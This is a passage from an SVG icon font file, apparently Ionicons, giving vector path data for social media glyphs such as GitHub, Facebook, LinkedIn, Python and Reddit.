c-28 23 -63 37 -102 37zM120 334c-41 -21 -71 -58 -83 -103h25c44 0 85 6 121 17c-19 34 -40 63 -63 86zM32 200v-8c0 -40 15 -78 40 -106c24 45 67 83 122 106c4 2 8 3 14 4c-3 8 -6 16 -10 24c-40 -13 -88 -20 -138 -21c-9 0 -19 1 -28 1zM192 32c20 0 39 3 57 10
c-3 25 -8 53 -15 79c-4 17 -10 33 -16 49c-7 -2 -13 -4 -17 -6c-48 -22 -86 -56 -107 -98c27 -21 61 -34 98 -34zM278 58c40 26 68 67 73 116c-30 2 -68 3 -99 0c4 -12 9 -25 12 -38c7 -27 11 -52 14 -78z" />
    <glyph glyph-name="ion-social-dribbble" unicode="&#xf22d;" horiz-adv-x="384" 
d="M192 384c106 0 192 -86 192 -192s-86 -192 -192 -192s-192 86 -192 192s86 192 192 192zM192 32c88 0 160 72 160 160s-72 160 -160 160s-160 -72 -160 -160s72 -160 160 -160zM242 201c-4 11 -8 21 -13 31c25 11 47 24 63 39c15 -19 26 -42 28 -67c-26 0 -55 -1 -78 -3z
M271 292c-15 -12 -34 -23 -56 -32c-12 22 -24 41 -38 59c5 1 10 1 15 1c30 0 57 -11 79 -28zM142 310c15 -18 28 -39 41 -62c-34 -10 -72 -16 -113 -17c11 36 38 65 72 79zM319 176c-4 -33 -21 -63 -46 -83c-3 14 -5 28 -9 43c-3 13 -8 26 -12 38c21 2 45 3 67 2zM194 192
c-43 -18 -79 -46 -104 -78c-16 22 -26 49 -26 78v7c49 1 95 8 134 21c4 -8 7 -16 10 -24c-6 -1 -10 -2 -14 -4zM219 170c6 -16 11 -32 15 -49c4 -15 7 -31 10 -46c-16 -7 -34 -11 -52 -11c-31 0 -59 11 -81 29c22 30 53 54 90 71c4 2 11 4 18 6z" />
    <glyph glyph-name="ion-social-dropbox-outline" unicode="&#xf22e;" horiz-adv-x="384" 
d="M113 371l79 -66l-114 -71l-78 63zM27 295l52 -42l86 53l-53 46zM306 235l78 -63l-78 -51v-39l-114 -69l-114 68v39l-78 52l78 63l114 -71l-79 -66l-19 12v-20l98 -59l98 59v20l-19 -12l-79 66zM79 217l-52 -44l85 -55l53 44zM219 162l53 -44l85 56l-52 43zM384 297
l-78 -63l-114 71l79 66zM219 305l86 -52l52 42l-85 56z" />
    <glyph glyph-name="ion-social-dropbox" unicode="&#xf22f;" horiz-adv-x="384" 
d="M113 371l79 -66l-114 -71l-78 63zM0 172l78 62l114 -70l-79 -66zM192 164l114 70l78 -62l-113 -74zM384 297l-78 -63l-114 71l79 66zM192 150l80 -66l34 22v-25l-114 -68l-114 68v25l34 -22z" />
    <glyph glyph-name="ion-social-euro-outline" unicode="&#xf4e0;" horiz-adv-x="320" 
d="M214 384c-53 0 -91 -9 -115 -27c-22 -16 -33 -40 -33 -74v-11v-17h-16h-34v-16h34h16v-15v-48v-17h-16h-34v-16h34h16v-15v-27c0 -34 11 -58 33 -74c24 -18 62 -27 115 -27c31 0 59 2 88 8l-5 35c-30 -4 -55 -7 -80 -7c-36 0 -59 6 -74 19c-19 16 -21 40 -21 60v13v15h16
h103l3 16h-106h-16v17v48v15h16h118l2 16h-120h-16v17v2c0 16 2 39 21 55c16 13 39 19 74 19c24 0 51 -3 80 -7l5 35c-29 6 -57 8 -88 8zM214 400v0c35 0 68 -3 106 -12l-9 -65c-37 6 -68 9 -94 9c-64 0 -79 -22 -79 -58v-3h139l-8 -48h-131v-48h124l-7 -48h-117v-12
c0 -44 15 -63 79 -63c26 0 57 3 94 9l9 -65c-38 -9 -71 -12 -106 -12c-115 0 -164 41 -164 117v26h-50v48h50v48h-50v48h50v12c0 76 49 117 164 117z" />
    <glyph glyph-name="ion-social-euro" unicode="&#xf4e1;" horiz-adv-x="320" 
d="M138 176h124l-7 -48h-117v-13c0 -44 15 -63 79 -63c26 0 56 3 93 9l10 -65c-38 -9 -71 -12 -106 -12c-115 0 -164 41 -164 117v27h-50v48h50v48h-50v48h50v11c0 76 49 117 164 117c35 0 68 -3 106 -12l-10 -65c-37 6 -67 9 -93 9c-64 0 -79 -22 -79 -58v-2h138l-7 -48
h-131v-48z" />
    <glyph glyph-name="ion-social-facebook-outline" unicode="&#xf230;" horiz-adv-x="192" 
d="M128 256h64l-8 -64h-56v-192h-83v192h-45v64h45v43c0 54 23 85 91 85h56v-64h-34c-27 0 -30 -9 -30 -26v-38zM170 208l4 32h-45h-17v17v37c0 10 1 21 9 30c10 11 25 12 37 12h18v32h-40c-28 0 -49 -6 -60 -18c-10 -11 -15 -27 -15 -51v-43v-16h-15h-30v-32h30h15v-16
v-176h51v176v16h17h41z" />
    <glyph glyph-name="ion-social-facebook" unicode="&#xf231;" horiz-adv-x="192" 
d="M128 256h64l-8 -64h-56v-192h-83v192h-45v64h45v43c0 54 23 85 91 85h56v-64h-34c-27 0 -30 -9 -30 -26v-38z" />
    <glyph glyph-name="ion-social-foursquare-outline" unicode="&#xf34c;" horiz-adv-x="320" 
d="M302 284c-12 -60 -25 -131 -27 -138zM281 416c35 0 45 -20 37 -57c-3 -16 -10 -44 -16 -75l-27 -137c-3 -13 -8 -35 -39 -35h-72c-3 0 -3 0 -6 -3c-2 -2 -115 -133 -115 -133c-9 -10 -23 -8 -28 -6s-15 8 -15 26v380s10 40 43 40h238zM280 352c6 31 6 32 -24 32h-195
c-29 0 -29 -3 -29 -28v-297c0 -38 1 -38 3 -38s10 8 29 31c0 0 78 89 79 90c2 2 3 2 6 2h62c26 0 28 6 33 31c4 21 36 177 36 177zM302 284c6 31 13 59 16 75zM233 352c5 0 9 -5 8 -11l-8 -44c-1 -4 -6 -9 -11 -9h-75c-8 0 -8 -5 -8 -13v-6c0 -8 0 -13 8 -13h64
s11 -6 10 -12s-11 -51 -12 -54s-4 -9 -11 -9h-62c-9 0 -11 -1 -17 -8l-54 -63c-1 -1 -1 -1 -1 0v231c0 5 5 11 11 11h158z" />
    <glyph glyph-name="ion-social-foursquare" unicode="&#xf34d;" horiz-adv-x="320" 
d="M281 416c35 0 45 -20 37 -57c-10 -49 -40 -202 -43 -213c-3 -13 -8 -34 -39 -34h-72c-3 0 -3 0 -6 -3c-2 -2 -115 -133 -115 -133c-9 -10 -23 -8 -28 -6s-15 8 -15 26v380s10 40 43 40h238zM275 146c3 11 33 164 43 213zM267 351c2 9 -5 16 -12 16h-191
c-9 0 -15 -8 -15 -15v-296c0 -1 1 -1 2 0c0 0 70 84 78 94s11 11 23 11h64c9 0 14 8 15 12s8 43 10 51s-6 16 -13 16h-82c-10 0 -18 8 -18 18v13c0 10 8 17 18 17h96s14 6 15 12z" />
    <glyph glyph-name="ion-social-freebsd-devil" unicode="&#xf2c4;" horiz-adv-x="512" 
d="M503 333c19 -37 8 -81 -20 -108s-60 -33 -60 -33c2 -32 16 -59 -41 -102c-43 -32 2 -90 2 -90c10 -14 23 -19 32 -32h-272s15 14 -7 32c0 0 -20 17 -18 29s6 13 9 15s0 7 0 7l-19 19s-13 -13 -44 -13c-38 0 -65 39 -65 39h46s-6 -8 -7 -13c-1 -4 1 -5 1 -5s11 -6 22 -6
c17 0 33 12 33 12l-24 22l-15 -4l-16 37l39 -10l-1 -15l28 -18s9 9 7 27s-9 26 -9 26s-4 0 -9 -4s-6 -6 -6 -6l-10 44s43 -19 50 -63c3 -20 -6 -35 -6 -35l17 -10s6 5 17 7s23 2 29 -8s5 -12 4 -19s0 -9 6 -11s6 -6 11 -8s15 -6 21 -2s8 11 8 18v16s-9 8 -32 20
s-54 22 -66 40s-12 44 0 57c9 10 23 25 26 35c4 14 4 42 4 42s-10 16 -8 40c2 30 22 84 96 114c0 0 -40 -55 -20 -80c0 0 37 11 77 9c31 -2 56 -12 73 -28s25 -23 47 -17s28 17 28 33c0 19 -16 51 -16 51s36 -7 58 -51zM195 245c14 4 21 -11 21 -11c14 25 30 60 22 64
s-64 -25 -66 -88c0 0 6 31 23 35zM232 230c5 7 34 8 37 -17c4 -35 -24 -57 -24 -57s7 -2 23 2c17 4 43 29 43 70s-21 66 -41 62s-38 -60 -38 -60z" />
    <glyph glyph-name="ion-social-github-outline" unicode="&#xf232;" 
d="M224 416c124 0 224 -103 224 -230c0 -101 -64 -188 -153 -218h-4c-8 0 -12 7 -12 12c0 8 1 31 1 62c0 21 -8 36 -16 43c50 6 103 25 103 113c0 25 -9 46 -23 62c2 6 10 29 -2 61h-5c-8 0 -27 -3 -57 -24c-18 5 -37 8 -56 8s-38 -3 -56 -8c-30 21 -49 24 -57 24h-5
c-12 -32 -4 -55 -2 -61c-14 -16 -23 -37 -23 -62c0 -88 52 -107 102 -113c-6 -6 -12 -16 -14 -31c-6 -3 -16 -6 -26 -6c-13 0 -28 5 -39 25c0 0 -13 22 -35 24v0c-2 0 -21 0 -1 -14c0 0 15 -8 25 -34c0 0 10 -33 53 -33c7 0 14 0 22 2v-39c0 -5 -3 -11 -11 -11h-4
c-89 30 -153 116 -153 218c0 127 100 230 224 230zM146 -0c-15 0 -28 4 -38 9c14 -10 28 -17 44 -23v6v8h-6zM157 73c-16 4 -35 10 -52 24c6 -6 11 -11 13 -16c7 -12 14 -17 25 -17c4 0 9 1 12 2c1 2 1 5 2 7zM347 14c17 13 32 28 45 46c26 37 40 80 40 126
c0 29 -5 58 -16 84c-10 25 -26 48 -45 68s-41 34 -66 45c-26 11 -53 17 -81 17s-55 -6 -81 -17c-25 -11 -47 -25 -66 -45s-35 -42 -45 -68c-11 -26 -16 -55 -16 -84c0 -46 14 -89 40 -126c10 -14 22 -27 35 -38c-7 8 -11 16 -13 22c-7 18 -15 24 -17 25h-2v1
c-5 3 -20 13 -15 28c3 9 12 15 25 15h1v0v0c13 -1 24 -6 32 -13c-21 19 -37 48 -37 98c0 24 7 47 21 66c-3 13 -6 34 5 62l3 8l7 2c2 0 5 1 10 1c12 0 31 -3 60 -22c17 4 35 6 53 6v0v0c18 0 36 -2 53 -6c29 19 48 22 60 22c5 0 8 -1 10 -1l7 -2l3 -7c11 -27 8 -50 5 -63
c14 -19 21 -41 21 -66c0 -92 -55 -117 -92 -125c3 -8 5 -18 5 -30v-51v-6c18 7 35 16 51 28z" />
    <glyph glyph-name="ion-social-github" unicode="&#xf233;" 
d="M224 416c124 0 224 -103 224 -230c0 -101 -64 -188 -153 -218h-4c-8 0 -12 7 -12 12c0 8 1 31 1 62c0 21 -8 36 -16 43c50 6 103 25 103 113c0 25 -9 46 -23 62c2 6 10 29 -2 61h-5c-8 0 -27 -3 -57 -24c-18 5 -37 8 -56 8s-38 -3 -56 -8c-30 21 -49 24 -57 24h-5
c-12 -32 -4 -55 -2 -61c-14 -16 -23 -37 -23 -62c0 -88 52 -107 102 -113c-6 -6 -12 -16 -14 -31c-6 -3 -16 -6 -26 -6c-13 0 -28 5 -39 25c0 0 -13 22 -35 24v0c-2 0 -21 0 -1 -14c0 0 15 -8 25 -34c0 0 10 -33 53 -33c7 0 14 0 22 2v-39c0 -5 -3 -11 -11 -11h-4
c-89 30 -153 116 -153 218c0 127 100 230 224 230z" />
    <glyph glyph-name="ion-social-google-outline" unicode="&#xf34e;" horiz-adv-x="256" 
d="M191 366c12 -10 37 -30 37 -68c0 -37 -21 -55 -43 -72c-7 -7 -15 -13 -15 -24s8 -17 14 -22l18 -14c23 -19 43 -36 43 -71c0 -47 -47 -95 -135 -95c-74 0 -110 35 -110 72c0 18 10 44 40 62c32 19 75 21 98 23c-7 9 -16 18 -16 34c0 9 2 14 5 20c-6 0 -11 -1 -16 -1
c-54 0 -85 40 -85 79c0 23 11 48 33 67c29 24 63 28 91 28h106l-33 -18h-32zM155 142c-4 1 -7 1 -12 1s-32 -1 -54 -8c-11 -4 -44 -16 -44 -52s36 -62 91 -62c49 0 75 24 75 55c0 26 -17 39 -56 66zM170 238c12 12 13 28 13 37c0 36 -22 92 -65 92c-13 0 -28 -6 -36 -16
c-9 -11 -11 -25 -11 -38c0 -34 20 -89 64 -89c13 0 27 6 35 14z" />
    <glyph glyph-name="ion-social-google" unicode="&#xf34f;" horiz-adv-x="288" 
d="M210 172c22 -18 45 -36 45 -73c0 -49 -48 -99 -140 -99c-80 0 -115 39 -115 77c0 10 3 42 42 65c27 16 61 20 85 22c-4 7 -8 16 -8 27c0 4 0 7 1 10h-4c-19 0 -46 4 -67 26c-15 15 -24 36 -24 57c0 26 13 53 35 71v0c32 25 70 29 95 29h133l-60 -33h-13
c11 -13 23 -31 23 -58c0 -40 -25 -59 -45 -74v-1c-6 -6 -11 -10 -11 -17c0 -6 4 -10 10 -15v0zM85 308c0 -13 4 -33 14 -51c7 -12 20 -27 41 -27c10 0 21 4 28 11c10 10 10 25 10 30c0 18 -6 38 -15 54c-7 13 -20 27 -40 27c-11 0 -22 -5 -29 -13c-6 -7 -9 -18 -9 -31z
M206 80c0 20 -13 31 -50 56c-3 0 -4 1 -8 1c-6 0 -32 -2 -51 -8c-16 -6 -37 -16 -37 -42c0 -31 32 -51 80 -51c41 0 66 17 66 44z" />
    <glyph glyph-name="ion-social-googleplus-outline" unicode="&#xf234;" 
d="M192 366c12 -10 36 -30 36 -68c0 -37 -21 -55 -43 -72c-7 -7 -15 -13 -15 -24s8 -18 14 -22l18 -14c23 -19 43 -36 43 -71c0 -47 -47 -95 -135 -95c-74 0 -110 35 -110 72c0 18 10 44 40 62c32 19 75 21 98 23c-7 9 -16 18 -16 34c0 9 3 14 5 20c-6 0 -11 -1 -16 -1
c-54 0 -85 40 -85 79c0 23 10 48 32 67c29 24 64 28 92 28h106l-33 -18h-31zM155 142c-4 0 -7 1 -12 1s-32 -1 -54 -8c-11 -4 -44 -16 -44 -52s36 -62 91 -62c49 0 75 24 75 55c0 26 -17 39 -56 66zM170 238c12 12 13 28 13 37c0 36 -22 92 -65 92c-13 0 -28 -6 -36 -16
c-9 -11 -11 -24 -11 -37c0 -34 20 -90 64 -90c13 0 27 6 35 14zM448 306v-18h-78v-81h-18v81h-80v18h80v78h18v-78h78z" />
    <glyph glyph-name="ion-social-googleplus" unicode="&#xf235;" 
d="M210 172c22 -18 45 -36 45 -73c0 -49 -47 -99 -139 -99c-80 0 -116 39 -116 77c0 10 3 42 42 65c27 16 61 21 85 23c-4 7 -8 15 -8 26c0 4 0 7 1 10h-4c-19 0 -46 4 -67 26c-15 15 -24 36 -24 57c0 26 13 53 35 71v0c32 25 69 29 94 29h134l-60 -33h-13
c11 -13 23 -31 23 -58c0 -40 -25 -59 -45 -74v-1c-6 -6 -11 -10 -11 -17c0 -6 4 -10 10 -15v0zM85 308c0 -13 4 -33 14 -51c7 -12 21 -27 41 -27c10 0 21 4 28 11c10 10 10 25 10 30c0 18 -6 37 -15 53c-8 13 -20 28 -40 28c-11 0 -23 -5 -29 -13c-6 -7 -9 -18 -9 -31z
M206 80c0 20 -13 31 -50 56c-3 0 -4 1 -8 1c-6 0 -31 -2 -50 -8c-16 -6 -38 -16 -38 -42c0 -31 32 -51 80 -51c41 0 66 17 66 44zM370 306h78v-34h-78v-81h-34v81h-80v34h80v78h34v-78z" />
    <glyph glyph-name="ion-social-hackernews-outline" unicode="&#xf236;" horiz-adv-x="384" 
d="M352 352h-320v-320h320v320zM384 384v0v-384h-384v384h384zM233 289h45l-64 -120v-72h-40v72l-66 120h47l40 -84z" />
    <glyph glyph-name="ion-social-hackernews" unicode="&#xf237;" horiz-adv-x="384" 
d="M0 384h384v-384h-384v384zM214 169l64 120h-45l-38 -84l-40 84h-47l66 -120v-72h40v72z" />
    <glyph glyph-name="ion-social-html5-outline" unicode="&#xf4e2;" horiz-adv-x="384" 
d="M0 416h384l-35 -403l-157 -45l-157 45zM319 37l30 347h-314l30 -347l127 -36zM84 184l-13 150h241l-4 -50h-184l4 -51h176l-14 -151l-98 -28l-99 28l-6 77h48l3 -39l54 -15l53 15l6 64h-167z" />
    <glyph glyph-name="ion-social-html5" unicode="&#xf4e3;" horiz-adv-x="384" 
d="M0 416h384l-35 -403l-157 -45l-157 45zM308 284l4 50h-241l13 -150h167l-6 -64l-53 -15l-54 15l-3 39h-48l6 -78l99 -27l98 28l14 151h-176l-4 51h184z" />
    <glyph glyph-name="ion-social-instagram-outline" unicode="&#xf350;" horiz-adv-x="384" 
d="M384 336v-289c0 -26 -22 -47 -48 -47h-288c-26 0 -48 21 -48 47v289c0 26 22 48 48 48h288c26 0 48 -22 48 -48zM192 272c-44 0 -80 -36 -80 -80s36 -80 80 -80s80 36 80 80s-36 80 -80 80zM352 288v48c0 9 -7 16 -16 16h-48c-9 0 -16 -7 -16 -16v-48c0 -9 7 -16 16 -16
h48c9 0 16 7 16 16zM337 32c9 0 15 7 15 16v176h-52c3 -10 4 -21 4 -32c0 -30 -11 -58 -32 -79s-50 -33 -80 -33s-58 12 -79 33s-33 49 -33 79c0 11 2 22 5 32h-53v-176c0 -9 8 -16 17 -16h288z" />
    <glyph glyph-name="ion-social-instagram" unicode="&#xf351;" horiz-adv-x="384" 
d="M112 192c0 53 27 80 80 80s80 -27 80 -80s-27 -80 -80 -80s-80 27 -80 80zM113 271c-14 -14 -23 -29 -28 -47h-85v112c0 13 4 25 14 34s22 14 35 14h288c13 0 24 -5 33 -14s14 -21 14 -34v-112h-84c-5 18 -14 33 -28 47c-22 22 -49 33 -80 33s-57 -11 -79 -33zM352 300
v39c0 4 -2 7 -4 9s-5 4 -9 4h-38c-4 0 -7 -2 -9 -4s-4 -5 -4 -9v-39c0 -4 2 -7 4 -9s5 -3 9 -3h38c4 0 7 1 9 3s4 5 4 9zM272 113c22 22 32 48 32 79h80v-144c0 -13 -5 -24 -14 -34s-20 -14 -33 -14h-288c-13 0 -24 4 -34 14s-15 21 -15 34v144h81c0 -31 10 -57 32 -79
s48 -33 79 -33s58 11 80 33z" />
    <glyph glyph-name="ion-social-javascript-outline" unicode="&#xf4e4;" 
d="M160 344h-48v-196c0 -30 -6 -50 -17 -64c-11 -13 -26 -20 -48 -20c-9 0 -18 1 -25 2l-4 -30c11 -2 25 -4 37 -4c34 0 59 8 76 25c19 18 29 48 29 90v197zM176 360v0v-213c0 -97 -49 -131 -121 -131c-18 0 -40 3 -55 8l8 62c10 -4 24 -6 39 -6c31 0 49 15 49 68v212h80z
M350 352c-34 0 -62 -9 -82 -26c-19 -15 -28 -36 -28 -60c0 -20 7 -36 21 -51c14 -14 34 -26 61 -36c23 -8 38 -15 48 -24c12 -11 18 -23 18 -38c0 -16 -7 -31 -20 -40c-12 -9 -28 -14 -48 -14c-28 0 -52 8 -70 15l-7 -32c18 -8 44 -14 72 -14c38 0 70 9 90 27
c18 16 27 38 27 63c0 21 -5 36 -17 50s-31 27 -58 37v0v0c-38 15 -72 28 -72 63c0 14 7 27 19 36c11 9 26 13 45 13c24 0 43 -5 57 -11l10 32c-19 6 -42 10 -66 10zM350 368v0c38 0 65 -7 85 -16l-19 -64c-13 7 -35 17 -67 17s-48 -16 -48 -33c0 -22 19 -31 62 -48
c58 -22 85 -53 85 -102c0 -57 -42 -106 -133 -106c-38 0 -72 10 -91 21l15 63v0c20 -11 49 -21 81 -21c34 0 52 15 52 38c0 21 -15 33 -55 47c-55 20 -93 52 -93 102c0 58 49 102 126 102z" />
    <glyph glyph-name="ion-social-javascript" unicode="&#xf4e5;" 
d="M176 360v0v-213c0 -97 -49 -131 -121 -131c-18 0 -40 3 -55 8l8 62c10 -4 24 -6 39 -6c31 0 49 15 49 68v212h80zM350 368v0c38 0 65 -7 85 -16l-19 -64c-13 7 -35 17 -67 17s-48 -16 -48 -33c0 -22 19 -31 62 -48c58 -22 85 -53 85 -102c0 -57 -42 -106 -133 -106
c-38 0 -72 10 -91 21l15 63v0c20 -11 49 -21 81 -21c34 0 52 15 52 38c0 21 -15 33 -55 47c-55 20 -93 52 -93 102c0 58 49 102 126 102z" />
    <glyph glyph-name="ion-social-linkedin-outline" unicode="&#xf238;" horiz-adv-x="384" 
d="M119 64v0h-55v171h55v-171zM93 261v0v0c-18 0 -29 13 -29 29c0 17 12 30 30 30s29 -13 29 -30c0 -16 -12 -29 -30 -29zM257 239c36 0 63 -24 63 -75v-100h-55v94c0 22 -8 37 -28 37c-15 0 -24 -10 -28 -20c-2 -4 -2 -9 -2 -14v-97h-55v171h55v-24c8 11 21 28 50 28z
M353 384c18 0 31 -13 31 -30v-321c0 -17 -13 -33 -31 -33h-320c-18 0 -33 16 -33 33v321c0 17 15 30 33 30h320zM350 32c1 0 2 1 2 2v316c0 1 -1 2 -2 2h-316s-2 -1 -2 -2v-315s1 -3 3 -3h315z" />
    <glyph glyph-name="ion-social-linkedin" unicode="&#xf239;" horiz-adv-x="384" 
d="M353 384c18 0 31 -13 31 -30v-321c0 -17 -13 -33 -31 -33h-320c-18 0 -33 16 -33 33v321c0 17 15 30 33 30h320zM119 64v171h-55v-171h55zM93 261c18 0 30 13 30 29c0 17 -11 30 -29 30s-30 -13 -30 -30c0 -16 11 -29 29 -29v0zM320 64v100c0 51 -27 75 -63 75
c-29 0 -42 -17 -50 -28v24h-55v-171h55v97c0 5 0 10 2 14c4 10 13 20 28 20c20 0 28 -15 28 -37v-94h55z" />
    <glyph glyph-name="ion-social-markdown" unicode="&#xf4e6;" 
d="M416 352c18 0 32 -14 32 -32v-256c0 -18 -14 -32 -32 -32h-384c-18 0 -32 14 -32 32v256c0 18 14 32 32 32h384zM252 96v0v192h-56l-42 -68l-42 68h-56v-192h56v96l42 -54l42 54v-96h56zM336 96v0l70 96h-42v96h-56v-96h-42z" />
    <glyph glyph-name="ion-social-nodejs" unicode="&#xf4e7;" horiz-adv-x="384" 
d="M192 -32c-6 0 -12 2 -17 5l-53 32c-8 5 -4 6 -1 7c11 4 14 5 25 12c1 1 3 1 4 0l39 -23c1 -1 4 -1 5 0l156 92c1 1 2 2 2 4v187c0 2 0 4 -2 5l-156 94c-1 1 -3 1 -4 0l-155 -94c-2 -1 -3 -3 -3 -5v-187c0 -2 0 -3 2 -4l40 -24c24 -12 38 1 38 15v183c0 3 2 5 5 5h22
c3 0 5 -2 5 -5v-183c0 -33 -19 -52 -49 -52c-9 0 -17 1 -37 11l-41 24c-10 6 -17 18 -17 30v190c0 12 7 24 17 30l158 95c10 6 24 6 34 0l158 -95c10 -6 17 -18 17 -30v-190c0 -12 -7 -24 -17 -30l-158 -94c-5 -3 -11 -5 -17 -5v0zM241 96c-65 0 -84 31 -84 59c0 3 1 5 4 5
h21c2 0 5 -2 5 -4c3 -22 16 -31 54 -31c33 0 47 11 47 29c0 11 -3 18 -55 23c-43 4 -71 15 -71 51c0 33 28 52 73 52c46 0 76 -14 79 -51c0 -1 -1 -2 -2 -3s-2 -2 -3 -2h-20c-2 0 -5 2 -5 4c-4 17 -16 23 -49 23c-36 0 -41 -12 -41 -22c0 -12 5 -16 54 -23s72 -16 72 -51
c0 -36 -29 -59 -79 -59v0v0z" />
    <glyph glyph-name="ion-social-octocat" unicode="&#xf4e8;" 
d="M146 161c9 0 16 -4 22 -13s10 -20 10 -32s-4 -22 -10 -31s-14 -13 -22 -13c-9 0 -17 4 -23 13s-9 19 -9 31s3 24 9 32c6 9 14 13 23 13zM303 161c9 0 16 -4 22 -13s9 -20 9 -32s-3 -22 -9 -31s-13 -13 -22 -13s-18 4 -24 13s-9 19 -9 31s3 24 9 32c6 9 15 13 24 13z
M414 276c24 -27 34 -66 34 -96c0 -24 -1 -46 -6 -65c-6 -19 -13 -35 -21 -47c-9 -12 -19 -23 -32 -32s-24 -17 -34 -21s-22 -8 -36 -10c-13 -2 -24 -4 -31 -4c0 0 -28 -1 -64 -1s-64 1 -64 1c-7 0 -18 2 -31 4c-14 2 -26 6 -36 10s-22 12 -34 21c-13 9 -23 20 -32 32
c-8 12 -15 28 -21 47c-5 19 -6 41 -6 65c0 31 10 70 34 96c0 0 -2 14 0 39s7 48 16 69c30 -3 67 -20 112 -51c15 4 36 6 62 6c28 0 48 -2 62 -6c20 14 39 24 58 33c19 8 33 13 41 15s13 3 13 3c9 -21 14 -44 16 -69s0 -39 0 -39v0zM348 42c28 13 42 40 42 81
c0 24 -8 43 -26 59c-9 9 -20 13 -32 15s-31 1 -56 -1s-40 -4 -52 -4s-25 2 -42 3s-30 3 -39 3c-10 0 -20 1 -31 -2s-21 -7 -28 -14c-17 -15 -25 -35 -25 -59c0 -41 13 -68 41 -81c27 -13 69 -18 123 -18h2c54 0 95 5 123 18z" />
    <glyph glyph-name="ion-social-pinterest-outline" unicode="&#xf2b0;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56s-100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136c14 -14 31 -25 48 -34c1 6 2 10 3 16c4 18 29 122 29 122
s-8 15 -8 36c0 33 20 58 44 58c20 0 30 -16 30 -34c0 -20 -13 -51 -20 -79c-6 -24 12 -43 35 -43c42 0 71 54 71 119c0 49 -33 85 -93 85c-68 0 -110 -50 -110 -107c0 -20 6 -33 15 -44c4 -5 5 -6 3 -12c-1 -4 -4 -14 -5 -18c-2 -6 -6 -8 -11 -6c-31 13 -46 48 -46 86
c0 64 54 140 160 140c86 0 142 -63 142 -129c0 -88 -49 -153 -121 -153c-24 0 -47 13 -55 28c0 0 -12 -52 -15 -62c-2 -6 -4 -13 -7 -19c15 -4 31 -6 47 -6c51 0 100 20 136 56z" />
    <glyph glyph-name="ion-social-pinterest" unicode="&#xf2b1;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224c-22 0 -44 3 -64 9c8 14 18 31 23 48c3 10 16 62 16 62c8 -15 30 -28 54 -28c72 0 121 65 121 153c0 66 -56 129 -142 129c-106 0 -160 -76 -160 -140c0 -39 15 -73 46 -86c5 -2 10 0 12 6c1 4 3 14 4 18
c2 6 1 7 -3 12c-9 11 -15 24 -15 44c0 57 42 107 110 107c60 0 94 -36 94 -85c0 -65 -29 -119 -71 -119c-24 0 -42 19 -36 43c7 28 20 59 20 79c0 18 -10 34 -30 34c-24 0 -43 -25 -43 -58c0 -21 7 -36 7 -36s-25 -104 -29 -122c-4 -17 -5 -35 -4 -51
c-79 35 -134 113 -134 205c0 124 100 224 224 224z" />
    <glyph glyph-name="ion-social-python" unicode="&#xf4e9;" horiz-adv-x="384" 
d="M129 199c-29 -5 -49 -30 -49 -57v-43v-3h-15c-29 0 -54 29 -62 69c-2 9 -3 17 -3 27v1c0 53 29 95 65 95h127v16h-96v29c0 26 7 40 46 47c13 2 29 4 45 4s39 -1 55 -4c25 -4 46 -22 46 -47v-57v-31c0 -21 -14 -38 -33 -43c-4 -1 -8 -2 -13 -2h-104h3c-4 0 -8 0 -12 -1z
M140 321c10 0 17 7 17 17s-7 18 -17 18s-18 -8 -18 -18s8 -17 18 -17zM380 225c3 -10 4 -21 4 -33c0 -16 -3 -30 -7 -43c-11 -31 -33 -53 -58 -53h-127v-16h96v-26c0 -26 -23 -40 -46 -47c-35 -10 -68 -9 -97 0c-25 7 -49 22 -49 47v54v33c0 21 14 36 33 41c4 1 8 2 13 2
h104c3 0 6 1 9 1c27 4 49 28 49 62v38v3h15c28 0 52 -26 61 -63zM244 65c-10 0 -18 -7 -18 -17s8 -18 18 -18s17 8 17 18s-7 17 -17 17z" />
    <glyph glyph-name="ion-social-reddit-outline" unicode="&#xf23a;" horiz-adv-x="449" 
d="M259 160c0 21 11 31 32 31s32 -10 32 -31s-11 -32 -32 -32s-32 11 -32 32zM127 160c0 21 11 31 32 31s32 -10 32 -31s-11 -32 -32 -32s-32 11 -32 32zM449 197c0 -20 -9 -36 -27 -45c1 -5 1 -9 1 -14c0 -38 -19 -71 -58 -98s-85 -40 -140 -40s-102 13 -141 40
s-58 59 -58 97c0 5 0 10 1 15c-18 9 -27 24 -27 45c0 14 5 25 15 35s21 15 35 15c13 0 24 -4 33 -13c36 25 79 39 129 41h7l29 98l86 -17c8 19 21 28 41 28c12 0 22 -4 31 -13s13 -20 13 -32s-4 -23 -13 -32s-19 -13 -31 -13s-23 4 -32 13s-13 19 -13 31l-69 14l-24 -77
c50 -2 94 -16 129 -41c10 9 21 13 34 13c9 0 16 -3 24 -7s14 -10 18 -18s7 -16 7 -25zM375 366c-4 0 -8 -1 -11 -2s-6 -4 -8 -6s-5 -6 -6 -9s-2 -6 -2 -10c0 -8 3 -14 8 -19s12 -8 19 -8c5 0 9 1 13 3s8 6 10 10s4 9 4 14c0 8 -3 14 -8 19s-12 8 -19 8zM18 197
c0 -11 5 -20 14 -27c7 19 19 37 37 53c-6 4 -12 6 -19 6c-3 0 -7 0 -10 -1s-6 -3 -9 -5s-5 -4 -7 -7s-4 -6 -5 -9s-1 -6 -1 -10zM355 55c34 23 50 51 50 83v9c-1 6 -3 12 -5 18c-6 16 -15 30 -30 43c-5 4 -10 9 -15 12v0c-36 25 -79 37 -130 37s-95 -12 -131 -37v0
c-5 -3 -10 -8 -15 -12c-15 -13 -24 -27 -30 -43c-2 -6 -4 -12 -5 -18v-9c0 -32 16 -60 50 -83c36 -25 80 -37 131 -37s94 12 130 37zM417 170c9 6 14 16 14 27c0 9 -3 17 -9 23s-13 9 -22 9c-7 0 -14 -2 -20 -6c18 -16 30 -34 37 -53zM289 90l13 -12
c-20 -20 -45 -30 -77 -30s-58 10 -78 30l13 12c16 -16 38 -24 65 -24s48 8 64 24z" />
    <glyph glyph-name="ion-social-reddit" unicode="&#xf23b;" horiz-adv-x="449" 
d="M449 197c0 -20 -11 -37 -27 -45c1 -5 1 -9 1 -14c0 -76 -89 -138 -199 -138s-198 61 -198 137c0 5 0 10 1 15c-16 8 -27 25 -27 45c0 28 23 50 50 50c13 0 24 -5 33 -13c33 23 79 39 129 41h2l31 103l90 -18c8 14 22 24 39 24v0h1c25 0 44 -20 44 -45s-19 -45 -44 -45h-1
